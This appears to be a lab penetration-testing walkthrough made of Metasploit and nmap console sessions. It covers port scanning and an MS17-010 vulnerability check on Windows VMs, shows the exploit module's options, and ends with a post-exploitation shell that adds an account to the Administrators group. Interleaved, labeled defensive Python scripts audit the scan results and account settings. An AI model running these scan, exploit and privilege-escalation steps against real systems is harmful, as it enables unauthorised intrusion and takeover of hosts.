```
   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    auxiliary/scanner/http/a10networks_ax_directory_traversal   2014-01-28       normal  No     A10 Networks AX Loadbalancer Directory Traversal
   1    auxiliary/scanner/snmp/aix_version                                           normal  No     AIX SNMP Scanner Auxiliary Module
   2    auxiliary/scanner/discovery/arp_sweep                                        normal  No     ARP Sweep Local Network Discovery
   ...
   614  auxiliary/scanner/rservices/rexec_login                                      normal  No     rexec Authentication Scanner
   615  auxiliary/scanner/rservices/rlogin_login                                     normal  No     rlogin Authentication Scanner
   616  auxiliary/scanner/rservices/rsh_login                                        normal  No     rsh Authentication Scanner

Interact with a module by name or index. For example info 616, use 616 or use auxiliary/scanner/rservices/rsh_login
```
```
# Use the syn module
msf6 > use auxiliary/scanner/portscan/syn
# Show the options
msf6 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

# Set the target host IP
msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.80.1
RHOSTS => 192.168.80.1
# Set the number of threads
msf6 auxiliary(scanner/portscan/syn) > set THREADS 40
THREADS => 40
# Check the options again
msf6 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.80.1     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    40               yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

# Start information gathering
msf6 auxiliary(scanner/portscan/syn) > run
[+] TCP OPEN 192.168.80.1:135
[+] TCP OPEN 192.168.80.1:139
[+] TCP OPEN 192.168.80.1:443
[+] TCP OPEN 192.168.80.1:445
[+] TCP OPEN 192.168.80.1:1433
[+] TCP OPEN 192.168.80.1:3306
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 15:10 CST
Nmap scan report for localhost (192.168.80.1)
Host is up (0.00077s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s     Microsoft SQL Server 2019 15.00.2095
3306/tcp open  mysql        MySQL 5.7.31-log
MAC Address: 00:50:56:C0:00:08 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.86 seconds
```
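The two scans above leave a defender with a concrete question: which of those open ports should actually be reachable? The following added example (my own code, not part of the original page) parses the syn scanner's `[+] TCP OPEN` lines and nmap's service table and reports every open port that is missing from an approved baseline for the host; the baseline itself is an assumption for illustration, not something the page states.

```python
import re

# Constructed sample input: the syn scanner's [+] lines and nmap's service table from the session above.
MSF_OUTPUT = """\
[+] TCP OPEN 192.168.80.1:135
[+] TCP OPEN 192.168.80.1:139
[+] TCP OPEN 192.168.80.1:443
[+] TCP OPEN 192.168.80.1:445
[+] TCP OPEN 192.168.80.1:1433
[+] TCP OPEN 192.168.80.1:3306
[*] Scanned 1 of 1 hosts (100% complete)
"""
NMAP_OUTPUT = """\
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s     Microsoft SQL Server 2019 15.00.2095
3306/tcp open  mysql        MySQL 5.7.31-log
"""
# Assumed approved baseline for this host (not from the page): RPC/NetBIOS/SMB and HTTPS only.
BASELINE = {"192.168.80.1": {135, 139, 443, 445}}
MSF_RE = re.compile(r"^\[\+\] TCP OPEN (\S+):(\d+)$")
NMAP_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)(?:\s+(.*))?$")

def parse_msf_open_ports(text):
    """Collect {host: {open ports}} from the syn scanner's [+] TCP OPEN lines; other lines are ignored."""
    hosts = {}
    for line in text.splitlines():
        m = MSF_RE.match(line.strip())
        if m:
            hosts.setdefault(m.group(1), set()).add(int(m.group(2)))
    return hosts

def parse_nmap_services(text):
    """Collect {port: (service, version)} from nmap's table rows; the header row does not match."""
    services = {}
    for line in text.splitlines():
        m = NMAP_RE.match(line.strip())
        if m:
            services[int(m.group(1))] = (m.group(2), (m.group(3) or "").strip())
    return services

def unexpected_exposure(open_ports, services, baseline):
    """Open ports outside the baseline, annotated with what nmap fingerprinted there (sorted by port)."""
    return {p: services.get(p, ("unknown", "")) for p in sorted(open_ports - baseline)}

if __name__ == "__main__":
    for host, ports in parse_msf_open_ports(MSF_OUTPUT).items():
        for port, (svc, ver) in unexpected_exposure(ports, parse_nmap_services(NMAP_OUTPUT), BASELINE.get(host, set())).items():
            print(f"{host}:{port} ({svc} {ver}) is open but not in the approved baseline")
```

Run against the page's session this reports 1433 (MS SQL) and 3306 (MySQL), the two database listeners the baseline does not cover.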
```
   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

# Set the target host IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.80.1
RHOSTS => 192.168.80.1
# Confirm the options
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.80.1                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

# Run the check (target host: Windows 11)
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.80.1:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.80.1:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
# Run the check (target host: Windows 7)
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.80.130:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.80.130:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
```

```
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.80.130   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
```
```
# List all current users
C:\Users\root\Documents>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
admin                    Administrator            ghost
Guest                    root                     ying
The command completed with one or more errors.

# View the admin user
C:\Users\root\Documents>net user admin
net user admin
User name                    admin
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2022/11/28 1:11:57
Password expires             2023/1/9 1:11:57
Password changeable          2022/11/28 1:11:57
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

# View the root user
C:\Users\root\Documents>net user root
net user root
User name                    root
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2022/11/27 23:31:04
Password expires             Never
Password changeable          2022/11/27 23:31:04
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2022/11/28 1:08:41

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

# Add the admin user to the administrators group to obtain the highest privileges
C:\Users\root\Documents>net localgroup administrators admin /add
net localgroup administrators admin /add
The command completed successfully.

# View the admin user again
C:\Users\root\Documents>net user admin
net user admin
User name                    admin
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2022/11/28 1:11:57
Password expires             2023/1/9 1:11:57
Password changeable          2022/11/28 1:11:57
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.
```
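From the defender's side, the `net user` output above is exactly what a local-account audit reads: root is an Administrators member with no password required and a password that never expires, and admin is a freshly added Administrators member that has never logged on. The following added example (my own code, not from the original page) parses `net user <name>` output into fields and raises those findings; the sample text is constructed in the layout `net user` prints, using the values from the session above.

```python
import re

# Constructed samples in the layout `net user <name>` prints; the values are those seen in the session above.
NET_USER_ROOT = """\
User name                    root
Password expires             Never
Password required            No
Last logon                   2022/11/28 1:08:41
Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.
"""
NET_USER_ADMIN = """\
User name                    admin
Password expires             2023/1/9 1:11:57
Password required            Yes
Last logon                   Never
Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
"""
FIELD_RE = re.compile(r"^(\S.*?)(?:\s{2,}(.*))?$")  # label, then 2+ spaces, then the value

def parse_net_user(text):
    """Map each `net user` field to its value; the two membership fields become lists of group names."""
    info = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("The command"):
            continue  # blank separators and the trailing status line carry no field
        key, value = FIELD_RE.match(line).groups()
        value = (value or "").strip()  # fields such as "Full Name" may legitimately be empty
        if key.endswith("emberships"):
            value = [g.lstrip("*") for g in value.split() if g != "*None"]
        info[key] = value
    return info

def audit_account(info):
    """Findings a defender would raise for one parsed account; an empty list means nothing notable."""
    findings = []
    if "Administrators" in info.get("Local Group Memberships", []):
        findings.append("member of local Administrators")
        if info.get("Last logon") == "Never":
            findings.append("administrator account has never logged on (recently created?)")
    if info.get("Password required") == "No":
        findings.append("account does not require a password")
    if info.get("Password expires") == "Never":
        findings.append("password never expires")
    return findings

if __name__ == "__main__":
    for raw in (NET_USER_ROOT, NET_USER_ADMIN):
        print(parse_net_user(raw)["User name"], audit_account(parse_net_user(raw)))
```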